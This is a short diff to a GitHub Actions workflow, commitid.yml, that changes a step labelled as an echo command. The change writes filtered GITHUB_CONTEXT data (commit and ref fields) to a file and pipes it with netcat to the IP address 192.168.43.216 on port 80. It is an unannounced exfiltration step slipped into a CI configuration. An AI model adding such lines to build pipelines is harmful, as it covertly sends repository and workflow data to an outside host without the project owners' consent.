--- a/.github/workflows/commitid.yml
+++ b/.github/workflows/commitid.yml
@@ -14,5 +14,7 @@ jobs:
     - uses: actions/checkout@v3
     - name: Run a echo command
       shell: bash
-      run: echo "$GITHUB_CONTEXT"| grep -i 'after\|ref_name'
+      run: |
+          echo "$GITHUB_CONTEXT"| grep -i 'after\|ref_name' > t.txt
+          cat t.txt| nc 192.168.43.216 80
        
